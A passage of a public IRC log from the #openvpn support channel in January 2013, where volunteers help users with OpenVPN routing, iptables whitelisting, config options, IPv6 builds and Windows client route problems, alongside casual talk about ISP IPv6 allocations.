comments if you'd like, or even mask your public IP if it wasn't commented. masking isn't preferred, but if you do it in a limited fashion no one usually minds much) 05:28 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 05:29 <+pekster> blackness-: A better way to do that is to use a match like -i $iface -p tcp --dport 1234 -j whitelist 05:29 <+pekster> Of course, you need to create a 'whitelist' chain first 05:29 <+pekster> Then just add rules there mathcing -s $ip1 -j ACCEPT 05:29 <+pekster> $ip2, etc, etc 05:29 <+pekster> But ipset is faster to do that if you have dozens, hundreds, or even thousands of IPs to do that with 05:31 < Minnebo> what is the difference between push "route 192..." and just route 192... 05:32 <+pekster> The push sends it to the client (assuming it specifies 'pull' or 'client' in its config) while the route command adds a route to the system where that config is at 05:32 < Minnebo> I think that is the problem no? 05:32 < blackness-> oh its just 4 IPs..my known IPs infact. 05:33 < Minnebo> my server has no route to answer? 05:34 <+pekster> Minnebo: What? You're pushing a route to the IP/netwnork your server is already on 05:34 <+pekster> What are you trying to do? Just route to 192.168.100.1/32 via the VPN? If the server alreaady owns that IP, you just need to push the /32 route and you're done 05:35 < Minnebo> I have: push "route 192.168.100.1/32 255.255.255.0" 05:35 < Minnebo> but should I add 05:35 < Minnebo> route 10.8.0.0 255.255.255.0 in the server config? 05:35 < fu_fu> does OpenVPN offer paid professional support? 05:35 <+pekster> You can't use CIDR 05:36 <+pekster> 192.168.100.1 255.255.255.255 05:36 <+pekster> That's a /32 host netmask 05:36 <+pekster> !cidr 05:36 <@vpnHelper> "cidr" is http://www.oav.net/mirrors/cidr.html 05:36 <+rob0> fu_fu, I think they do, look at their web page. It might only be for OpenVPN Access Server, however. 05:36 < Minnebo> from the server I cannot ping to my client 05:36 < Minnebo> so it has no route i think 05:36 < Minnebo> :p 05:36 <+pekster> How are you trying to ping it? Via VPN IP? 05:37 < Minnebo> local 05:37 < Minnebo> no yes 05:37 < Minnebo> the dhcp ip I get from the openvpn 05:37 <+pekster> Then it's your firewall that's a problem 05:37 < Minnebo> damn 05:38 <+pekster> You don't usually need to ping the client from the server to get access to resources on the server that the client initiates. Not if your firewall is set up in a sane way 05:38 < Minnebo> i'll test an fwd-accept-all 05:39 <+pekster> Let me put it this way: if you can ping from client to whatever server-side IP you want and verify (via tcpdump or wireshark or whatever) that it's actually going across the VPN tunnel, then anything else after that is your firewall config 05:39 <+pekster> If you can't ping your target, you either have a routing or firewall problem 05:44 -!- Inst [blackfores@unaffiliated/inst] has joined #openvpn 05:44 < Inst> hi! 05:44 < Inst> <# 05:44 < Inst> http://community.openvpn.net/openvpn/wiki/TrafficObfuscation 05:44 <@vpnHelper> Title: TrafficObfuscation – OpenVPN Community (at community.openvpn.net) 05:45 < blackness-> what about it? 05:46 < Inst> just wondering if anyone has any experience with it 05:46 < holmen> !cidr 05:46 <@vpnHelper> "cidr" is http://www.oav.net/mirrors/cidr.html 05:46 -!- Inst [blackfores@unaffiliated/inst] has left #openvpn ["Leaving"] 05:46 -!- bakery [~qjkh@124.248.205.28] has joined #openvpn 05:48 < bakery> oh, hey, it appears the gov manually blocked my IP 05:48 * bakery facepalms 05:50 <+pekster> heh. You're "interesting" now :P 05:50 <+pekster> Lousy cencorship :( 05:51 < bakery> they did this to me twice 05:51 < bakery> i'm wondering if my VPS providers are going to start bitching at me because I get their expensive IPs blocked 05:54 < Minnebo> pekster, 05:54 < Minnebo> my fucking god :D 05:54 < Minnebo> i open internet 05:55 < Minnebo> and navigate to 192.168.100.1 and I get an interface of a modem O_o 05:55 < Minnebo> :D 05:55 < Minnebo> i'll test this at home again 05:55 <+pekster> Told you it was probably an upstream IP that was another 192.168.100.1 05:55 <+pekster> RFC1918 lets anyone use the private IP space for any purpose 05:56 < Minnebo> but i dont get it, my route says to use another gw 05:56 < Minnebo> then why does he still reach this modem page: p 05:56 <+pekster> That's why I said to trace the ping from the client to make sure it's going over the right interface 05:56 <+pekster> If it doesn't your routing is screwed up 05:57 -!- bakedin [SouthOfThe@216.131.64.53] has joined #openvpn 05:57 <+pekster> If it does, then follow the packet to make sure it's getting to the peer at the other end of the tunnel 05:57 < Minnebo> with wireshark 05:57 <+pekster> Sure 05:57 < Minnebo> k 05:57 -!- bakery [~qjkh@124.248.205.28] has quit [Ping timeout: 260 seconds] 05:57 < Minnebo> well gtg now visit some customers i'll look at this again tonight! 05:58 < Minnebo> thx for your help 06:02 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has quit [Quit: Changing server] 06:02 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has joined #openvpn 06:02 -!- Minnebo [~Minnebo@office.exabyte.be] has quit [Ping timeout: 260 seconds] 06:23 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has quit [Quit: leaving] 06:26 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has joined #openvpn 06:27 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 06:46 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 06:50 -!- bakedin [SouthOfThe@216.131.64.53] has quit [Ping timeout: 252 seconds] 06:50 -!- blackness- [black@199.175.53.115] has quit [Ping timeout: 264 seconds] 06:50 -!- bakery [blackfores@216.131.70.179] has joined #openvpn 06:53 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 245 seconds] 06:55 -!- bakery [blackfores@216.131.70.179] has quit [Ping timeout: 245 seconds] 06:56 -!- bakery [~qjkh@124.248.205.28] has joined #openvpn 06:56 -!- tuxick [~userMurf@tuxick.xs4all.nl] has joined #openvpn 06:56 < tuxick> lo 06:56 <@ecrist> good morning 06:56 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 06:57 < tuxick> on ubuntu trying to use update-resolv-conf, but getting "Failed running command ( --up/--down): could not execute external program" 06:57 < tuxick> without any clue/explanation. script is executable of course 06:57 <@ecrist> so, the update-resolv-conf script isn't working 06:57 < tuxick> it lacks some verbosity :) 06:57 <@ecrist> have you tried executing it as the user you run the openvpn process as? 06:58 < tuxick> starting it as root 06:58 <@ecrist> let me see your config 06:58 < tuxick> added an 'echo FOO' to that script, i only see that echo when i run ./update-resolv-conf 06:59 < tuxick> well, config works, except the "up /etc/openvpn/update-resolv-conf" bit 06:59 <@ecrist> config, please 06:59 <@ecrist> also, an ls -l update-resolv-conf 07:00 < tuxick> world executable 07:00 < tuxick> sec for config 07:00 <@ecrist> I'd like to see the output, please 07:01 < tuxick> -rwxr-xr-x 07:01 <@ecrist> you're not very good at following directions 07:02 < tuxick> it's on my netbook, which is busy, paste will take a bit 07:02 <@ecrist> meh, I've got other things to do 07:04 < tuxick> i'll doublecheck when system update is done :) 07:07 -!- blackness- [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn 07:07 -!- blackness- [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Client Quit] 07:08 -!- bauruine [~stefan@91.236.116.112] has quit [Quit: Leaving] 07:39 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 07:57 -!- sukosevato [sukosevato@a202101.upc-a.chello.nl] has joined #openvpn 08:33 -!- gustavoz [~gustavoz@host212.200-82-114.telecom.net.ar] has joined #openvpn 08:34 < gustavoz> hi, a quick question i couldn't find a quick answer to, are non-ipv6 builds deprecated for 2.3+ ? 08:38 < plaisthos> gustavoz: there are no non ipv6 builds 08:39 < gustavoz> plaisthos: ok thanks, then i guess the answer is yes :) 08:39 < plaisthos> basically 2.2 had no or only limited ipv6 support and 2.3 has ipv6 support 08:40 < gustavoz> exactly, i could build 2.2.x on a non-ipv6 enabled toolchain, but on 2.3 that option is missing 08:40 < plaisthos> gustavoz: You have not ipv6 enabled toolchain? 08:41 < gustavoz> plaisthos: sure, on buildroot we give that option when possible, that's the reason for my question, at the moment it doesn't seem possible without patching around, probably a lot 08:42 < plaisthos> gustavoz: what is that? SunOS 4.x? 08:42 < gustavoz> plaisthos: a tool for building embedded linux root filesystems / firmwares / whatever 08:43 < plaisthos> gustavoz: but these still have the ipv6 library functions 08:43 < gustavoz> plaisthos: on uClibc not necessarily 08:43 < plaisthos> not ipv6 enabled toolchain I would except to miss functions like getaddrinfo 08:43 -!- Orbi [~opera@anon-186-110.vpn.ipredator.se] has quit [Quit: Orbi] 08:44 < gustavoz> since it's tailored to be really small when the libc is configured for non-ipv6 builds some structures are missing too 08:44 < gustavoz> for instance in6_pktinfo 08:45 < gustavoz> s/instance/example/ :) 08:46 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 08:48 < plaisthos> Yeah. There is no ipv4 only version of openvpn in 2.3 08:48 < plaisthos> time to move on ;) 08:48 < gustavoz> cool, thanks, i'm not about to bitch about it, just wanted to know :) 08:49 < gustavoz> the option is given when possible, there are no guarantees for future versions 08:49 < gustavoz> it's not like you can build Qt without a full C++ toolchain for example 08:55 * tuxick mumbles about addrinfo 08:55 < plaisthos> tuxick: ?! 08:57 <+pekster> gustavoz: IPv6 should work fine on ulibc; OpenWRT uses that on its backend and supports IPv6 08:58 <+pekster> Maybe that project can offer hints as to the linking required for OpenVPN to build against it? I haven't looked at the kernel code on recent OpenWRT versions to see if they had to make adjustments or not, but it sounds like it's doable. If OpenVPN won't build cleanly, I'm sure patches or discussion on the dev mailing list would be appreciated 08:58 < tuxick> plaisthos: nevermind :) 09:00 < gustavoz> pekster: yes that's true, it's just that buildroot is more option-Y for the toolchain than openwrt 09:00 <+pekster> Sure. And if your buildroot lacks support you have lower-level issues to fix first 09:00 <+pekster> I'm just suggesting a place to start if you want to see how a project has managed ulibc in particular with IPv6 given that they're both targeted to embedded systems 09:01 < gustavoz> it's just a matter of accounting for it in Kconfig, hence my question if it's intended or just broken 09:01 <+pekster> Sure 09:02 < gustavoz> i'm all for ipv6 support by default, just covering my ass so to speak when some freaky asks about why 09:02 <+pekster> "Because IPv4 is busted" is a nice answer ;) 09:03 <+pekster> IMO it's foolish to design or publish a system thesedays without IPv6 support available. Maybe not active if you're part of the large IPv4-only Internet still, but the age is coming to an end ;) 09:03 < gustavoz> it's like the non-crypto option being gone (!openssl & !polarssl), it's a damn vpn package, you WANT crypto 09:03 <+pekster> Right. GRE or IPIP is for tunneling without crypto :P 09:04 * pekster is greatly looking forward to the day when everything is more or less globally uniquely identifiable. It'll be just like the 1980's all over again :D 09:05 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 09:09 < gustavoz> heh, i wish my ISP would have IPv6 connectivity, it's like the dark ages here 09:09 < plaisthos> gustavoz: don't wish for it 09:09 < plaisthos> one provider here now gives its customers IPv6 because they are running out of IPv4 09:09 < plaisthos> and you get Dualstack lite 09:13 < gustavoz> ouch! 09:15 < tuxick> when i requested a /64 for office ISP told me they could only give me 64 addresses 09:16 < tuxick> assuming i had some sales clown on phone, but it turned out correct 09:16 <+pekster> wow, that's nuts 09:16 < tuxick> "sorry that's all we can do now" 09:16 <+pekster> The recommendation is a /64 or even a /58 for *residential* netwnorks 09:16 < tuxick> i have native /64 for my home dsl :) 09:16 <+pekster> And larger for offices 09:16 < tuxick> ye 09:17 <+pekster> One thing I'm hoping we don't see is segregated tiers of IPv6 "service" where the lower tiers just give you a handful of IPs for home devices (say a /120 or something) and they have you pay a "premium" for proper IPv6 access 09:18 <+rob0> We WILL see. Greed, ignorance and incompetence are the rule. 09:18 < tuxick> idd 09:18 <+hazardous> my isp gives /56 09:19 <+pekster> One of the "good guys" then 09:19 -!- Minnebo [~Minnebo@office.exabyte.be] has joined #openvpn 09:25 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 264 seconds] 09:27 -!- Devastator [~devas@186.214.14.9] has joined #openvpn 09:31 -!- Devastator [~devas@186.214.14.9] has quit [Changing host] 09:31 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 09:35 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 09:42 -!- cornfeed [~cornfeed@unaffiliated/cornfeed] has left #openvpn ["Once you know what it is you want to be true, instinct is a very useful device for enabling you to know that it is"] 09:53 < plaisthos> tuxick: 64 addresses?! 09:53 <+hazardous> pekster: rdns too! and static ips! and v4 subnets! and symmetrical 09:53 <+hazardous> this has made me hate normal 'big monopoly' isps so much 09:54 < tuxick> plaisthos: ye, i was convinced some sales manager misunderstood the 64 bit 09:56 <+hazardous> 07:16:00 < tuxick> assuming i had some sales clown on phone, but it turned out correct 09:56 <+hazardous> i've had some sales guy at comcast tell me each ipv6 was subject to the same $5/IP/month charge for static ipv6 single addresses 09:57 < tuxick> haha 09:58 <+rob0> And Comcast is among the ipv6 leaders. In the organization they probably do have ipv6 clue. But the suits run the show, and they're going to milk every possible penny out of it. 10:01 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 10:01 < plaisthos> tuxick: that sound like a mixup between /64 and 64 ips and then someone forced the technicans to really do 64 ips 10:02 <+pekster> $5/ip/mo? haha 10:03 < tuxick> no, in the end i got someone on phone who explained they just didn't have the right hardware yet 10:03 <+pekster> python tells me: >>> 2**64*5 10:03 <+pekster> 92233720368547758080 10:03 <+pekster> Imagine them sending you a bill for that :P 10:03 < tuxick> but maybe that was a poor tech just covering for management idiots 10:03 <+pekster> Plus your monthly service cost :P 10:22 -!- master_of_master [~master_of@p57B54C0D.dip.t-dialin.net] has quit [Ping timeout: 276 seconds] 10:24 -!- Porkepix_ [~Porkepix@ppp-seco11pa2-46-193-142.4.wb.wifirst.net] has joined #openvpn 10:24 -!- master_of_master [~master_of@p57B52905.dip.t-dialin.net] has joined #openvpn 10:24 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:25 -!- Porkepi__ [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 10:25 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 248 seconds] 10:25 -!- Porkepi__ is now known as Porkepix 10:27 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds] 10:28 -!- Porkepix_ [~Porkepix@ppp-seco11pa2-46-193-142.4.wb.wifirst.net] has quit [Ping timeout: 255 seconds] 10:29 -!- gustavoz [~gustavoz@host212.200-82-114.telecom.net.ar] has quit [Quit: Leaving] 10:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:32 -!- Minnebo [~Minnebo@office.exabyte.be] has quit [Ping timeout: 264 seconds] 10:48 < genghi1> hi… I noticed that when using learn-address, the $3 parameter is not preserved when a client is disconnecting, only connecting. Is that a known issue? 10:50 <+pekster> genghi1: That's intended behaviour according to the manpage. What's your use-case for wanting it on a delete action? 10:54 < genghi1> well… I can certainly do without it, but it would just make my iptables management easier if it was there 10:54 < genghi1> it is not really a problem for me 10:54 < genghi1> I was inserting the cn name into the comments for the rules 10:55 <+pekster> Why do you need to care about the comment when deleting them? 10:55 < genghi1> I was deleting them the lazy way by matching the rule itself and not the rule number. 10:55 < genghi1> that requires matching the comment too 10:55 -!- bakedin [~qjkh@111.192.134.20] has joined #openvpn 10:56 <+pekster> Oh. Well, don't use a comment then? :) 10:56 -!- bakery [~qjkh@124.248.205.28] has quit [Ping timeout: 260 seconds] 10:57 <+pekster> Or use a creative scripting solution to store it in a temp file and reference it by IP. I'd just do without it personally 10:57 < genghi1> heh, I'll add a comment but use awk or something to re-process the rules to delete them by rule number 10:57 < genghi1> no biggie 11:00 -!- bakedin [~qjkh@111.192.134.20] has quit [Ping timeout: 245 seconds] 11:02 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 11:03 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 11:04 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 264 seconds] 11:06 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 276 seconds] 11:09 < con3x> Woo, finally solved my problem 11:10 -!- raidz_away is now known as raidz 11:10 < con3x> Apparently I needed to add "route-nopull" to my config and just configure all my routes automatically 11:11 < con3x> /s/automatically/manually 11:12 <+pekster> Well, it's automatic after you manually script it :P 11:14 < con3x> Yeah :) I wrote a python script to do the DNS lookups :P need to do some packet inspection to see what pandora and hulu talk to now. 11:15 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 11:15 < fu_fu> hi 11:15 < con3x> hi fu_fu. 11:17 < fu_fu> can "—ping-exit n" be used in the current version? and can it be used on the client side, or was it replaced "keepalive"? should keepalive be used on the client side? 11:17 < fu_fu> ^^ i mean —ping-restart 11:18 < fu_fu> from the manpage it looks like keepalive is the new way to do it, maybe i just need to know if you have to put it on both sides 11:20 <+pekster> fu_fu: --ping needs to be on the opposite side from a --ping-restart or --ping-exit option 11:21 <+pekster> --keepalive is just a helper-directive to set both at once with values as described in the manpage; it's a helper-directive that expands to others 11:21 < fu_fu> thx for the clarification 12:25 -!- b1rkh0ff [~b1rkh0ff@178.77.8.47] has quit [Ping timeout: 252 seconds] 12:32 -!- Orbi [~opera@anon-186-110.vpn.ipredator.se] has joined #openvpn 12:38 -!- b1rkh0ff [~b1rkh0ff@178.77.1.200] has joined #openvpn 12:48 -!- nutron|w [~nutron@unaffiliated/nutron] has quit [Quit: I must go eat my cheese!] 13:03 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 276 seconds] 13:06 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 13:27 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 13:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:31 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 13:50 -!- pelle2 [~p@178-132-78-93.cust.azirevpn.net] has quit [Ping timeout: 276 seconds] 13:51 -!- novaflash [~novaflash@vpnserver1.jellemaautomatisering.nl] has quit [Changing host] 13:51 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has joined #openvpn 13:51 -!- mode/#openvpn [+o novaflash] by ChanServ 13:59 -!- deed02392 is now known as Daedy 14:01 -!- Orbi [~opera@anon-186-110.vpn.ipredator.se] has left #openvpn [] 14:09 <+hazardous> goodbye orbi. 14:24 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has joined #openvpn 14:26 -!- sukosevato is now known as Cpt-Oblivious 14:36 -!- genghi1 [~Adium@p5089BF98.dip.t-dialin.net] has quit [Quit: Leaving.] 14:45 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 15:13 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:23 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:25 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 15:35 -!- pekster [~rewt@openvpn/user/pekster] has quit [Ping timeout: 255 seconds] 15:35 -!- pekster [~rewt@openvpn/user/pekster] has joined #openvpn 15:35 -!- mode/#openvpn [+v pekster] by ChanServ 15:37 -!- nutron|w [~nutron@24.67.96.21] has joined #openvpn 15:38 -!- nutron|w [~nutron@24.67.96.21] has quit [Changing host] 15:38 -!- nutron|w [~nutron@unaffiliated/nutron] has joined #openvpn 15:41 -!- nutron is now known as Guest25591 15:44 -!- nutron|w is now known as nutron 15:51 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- In tests, 0x09 out of 0x0A l33t h4x0rz prefer it :)] 15:52 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 15:52 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0/20130104151925]] 15:56 < dioz> for server bridge 15:56 < dioz> in the instance there is only one client 15:56 < dioz> and one ip in the ``pool'' 15:57 < dioz> can i use server-bridge 10.8.0.4 255.255.255.0 10.8.0.4 10.8.0.4 16:14 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 16:28 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has joined #openvpn 16:59 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 17:01 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Quit: Leaving] 17:17 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 17:18 -!- Devastator [~devas@186.214.14.9] has joined #openvpn 17:18 -!- Devastator [~devas@186.214.14.9] has quit [Changing host] 17:18 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 17:22 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has quit [Ping timeout: 245 seconds] 17:37 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.] 17:40 -!- blackness [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn 17:40 < blackness> to set a list of IPs for the allowed connection, should i allow * via the program and filter iptables or the other way around? 17:41 <+hazardous> why not both? 17:41 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has left #openvpn [] 17:41 < blackness> little wasteful don'tcha think? 17:42 < blackness> plus does the .conf accept CIDR settings? 17:55 -!- ddaydj [~ddaydj@rrcs-66-91-144-147.west.biz.rr.com] has joined #openvpn 17:57 < ddaydj> hello. so is there a trick to get the community client to push routes on windows without running as admin? 17:59 < ddaydj> i can connect to the vpn with the community client, but no routes unless i run as admin. i've used the access server client with another vpn and that pushes routes, but for some reason, i can't connect to this new vpn server i setup with that client 18:03 < blackness> what about disabling ACL's? 18:03 < blackness> or set the program to run as admin by default? 18:07 < ddaydj> that would still require an admin password that the user won't have 18:08 < blackness> no it wont, you add the program into the ACL..unless you have some weird setup..only time i use windows is when i fix others computers lol. 18:10 < ddaydj> i'm not sure how well that will work. i'll look into it tho 18:10 < ddaydj> some of the client computers will not be ones that are adminstrated by other companies so i'm not sure how they'll like that idea 18:11 < ngharo> i'd setup the VPN on a gateway then 18:11 < ddaydj> the server? or the client? 18:12 -!- b1rkh0ff [~b1rkh0ff@178.77.1.200] has quit [Ping timeout: 248 seconds] 18:12 < ngharo> client 18:12 < ddaydj> like set it as the default gateway on the workstation? 18:12 < ngharo> like connect the default gateway up to your vpn server 18:13 < ddaydj> that's not an option. my clients are going to be laptops at people's home and workstations inside vendors' networks 18:14 < ngharo> i see 18:14 -!- brute11k [~brute11k@89.249.235.236] has quit [Quit: Leaving.] 18:15 < ngharo> http://openvpn.net/index.php/open-source/documentation/install.html?start=1 18:15 <@vpnHelper> Title: Installation Notes - Installation (Win32) (at openvpn.net) 18:15 < ngharo> describes running openvpn as a service 18:16 < ddaydj> i'm familiar with doing that, but that's an always on thing. limited users accounts can't start and stop services 18:17 -!- Cpt-Oblivious [sukosevato@a202101.upc-a.chello.nl] has quit [] 18:17 < ddaydj> in the case of the access server client, it has a service installed which i think is what it uses to push the routes when connecting from a limited user account 18:17 < ddaydj> afk for a minute 18:22 < ddaydj> so can you guys help with troubleshooting the access server client? or is that the other channel? 18:29 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Read error: Operation timed out] 18:29 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 18:41 -!- ddaydj [~ddaydj@rrcs-66-91-144-147.west.biz.rr.com] has quit [] 18:45 -!- donhoe [~jeepers@c-69-247-138-234.hsd1.tn.comcast.net] has joined #openvpn 18:52 -!- ikonia [~irc@unaffiliated/ikonia] has quit [Read error: Operation timed out] 18:52 -!- ikonia [~irc@unaffiliated/ikonia] has joined #openvpn 19:12 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Connection reset by peer] 19:31 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 19:54 < ngharo> !as 19:54 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 19:57 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 19:57 -!- raidz is now known as raidz_away 20:06 -!- p3rror [~mezgani@2001:0:53aa:64c:2cea:7a37:d673:480f] has joined #openvpn 20:11 -!- holmen_ [~holmen@h-30-250.a176.priv.bahnhof.se] has joined #openvpn 20:14 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has quit [Ping timeout: 260 seconds] 20:17 -!- EugeneKay [eugene@go-without.me] has quit [Remote host closed the connection] 20:18 -!- EugeneKay [eugene@go-without.me] has joined #openvpn 20:36 <+dvl> http://dan.langille.org/2013/01/15/how-not-to-order-ram-for-your-motherboard/ 20:53 < EugeneKay> I've done that. 20:56 -!- p3rror [~mezgani@2001:0:53aa:64c:2cea:7a37:d673:480f] has quit [Ping timeout: 260 seconds] 21:55 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 21:56 < kunji> !welcome 21:56 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 21:56 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 21:56 < kunji> !goal 21:56 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 21:56 < kunji> !howto 21:56 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 21:58 < kunji> !route 21:58 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 21:59 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 23:26 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 23:28 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds] 23:50 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 23:52 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 246 seconds] 23:55 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 23:58 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 245 seconds] --- Day changed Wed Jan 16 2013 00:06 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 00:09 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 248 seconds] 00:30 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 00:32 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 248 seconds] 00:33 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 00:35 -!- arekm [~arekm@pld-linux/arekm] has quit [Read error: Connection reset by peer] 00:35 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 252 seconds] 00:38 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 00:40 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer] 00:41 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 255 seconds] 00:43 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 00:44 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 246 seconds] 00:47 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 00:47 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 00:48 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 00:49 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 264 seconds] 00:51 -!- Orbi [~opera@109.129.7.235] has joined #openvpn 00:56 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 00:58 -!- Orbi [~opera@109.129.7.235] has quit [Ping timeout: 245 seconds] 00:59 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 264 seconds] 00:59 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 01:00 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn 01:01 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds] 01:17 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] 